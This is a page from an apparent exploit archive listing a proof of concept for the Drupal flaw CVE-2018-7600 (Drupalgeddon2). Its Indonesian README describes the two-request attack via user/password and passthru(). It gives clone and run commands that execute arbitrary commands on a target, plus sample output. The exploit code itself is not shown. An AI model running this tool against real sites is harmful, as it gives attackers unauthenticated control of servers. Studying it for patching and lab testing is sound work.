Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-7600 PoC — Drupal 安全漏洞

Source
Associated Vulnerability
Title:Drupal 安全漏洞 (CVE-2018-7600)
Description:Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Description
Program python untuk melakukan RCE pada drupal versi 7.56
Readme
Siap Dewa, aku tambahkan juga bagian penggunaan mulai dari `git clone`, jadi README-nya lengkap.
Ini versi final yang tinggal kamu copy-paste ke `README.md` di repo GitHub kamu.


# CVE-2018-7600 - Drupalgeddon2 RCE Exploit

Exploit ini memanfaatkan kerentanan **Drupal 7.56** (dan beberapa versi sebelumnya) yang dikenal dengan nama **Drupalgeddon2**.  
Kerentanan ini memungkinkan **Remote Code Execution (RCE)** tanpa autentikasi dengan memanfaatkan celah pada formulir yang rentan.

🔗 **Repository:** [https://github.com/xxxTectationxxx/CVE-2018-7600](https://github.com/xxxTectationxxx/CVE-2018-7600)

---

## ⚠️ Peringatan
Script ini dibuat **hanya untuk tujuan pembelajaran** dan **pengujian di lingkungan lab**.  
Dilarang digunakan pada sistem yang tidak memiliki izin resmi untuk diuji.

---

## 🎯 Target Versi
- Drupal 7.x (termasuk 7.56) yang belum dipatch.
- Mungkin juga bekerja pada beberapa versi awal Drupal 8.

---

## 📜 Cara Kerja Singkat
1. Mengirim payload ke endpoint `user/password` dengan parameter yang memicu fungsi `passthru()` di PHP.
2. Mengekstrak `form_build_id` dari respon server.
3. Mengirim request kedua untuk mengeksekusi perintah sesuai yang diminta.

---

## 📦 Instalasi & Penggunaan

Clone repository:
```bash
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
````

Install dependencies:

```bash
pip install requests
```

Jalankan exploit:

```bash
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
```

Contoh:

```bash
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
```

## 💻 Contoh Output

```bash
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
```

---

## 🛡️ Mitigasi

* Update Drupal ke versi terbaru.
* Terapkan patch keamanan resmi dari Drupal.
* Batasi akses ke server selama proses perbaikan.

---

## 📚 Referensi

* [Drupal Security Advisory SA-CORE-2018-002](https://www.drupal.org/sa-core-2018-002)
* [Exploit-DB Entry #44449](https://www.exploit-db.com/exploits/44449)

---

**Disclaimer:** Penulis tidak bertanggung jawab atas penyalahgunaan script ini.
Gunakan dengan bijak dan hanya pada sistem yang sah untuk diuji.

File Snapshot

[4.0K] /data/pocs/406beccbc436c084b79f506ba3bcb5ad93b73e88 ├── [1.5K] drupal7.56-RCE.py └── [2.2K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →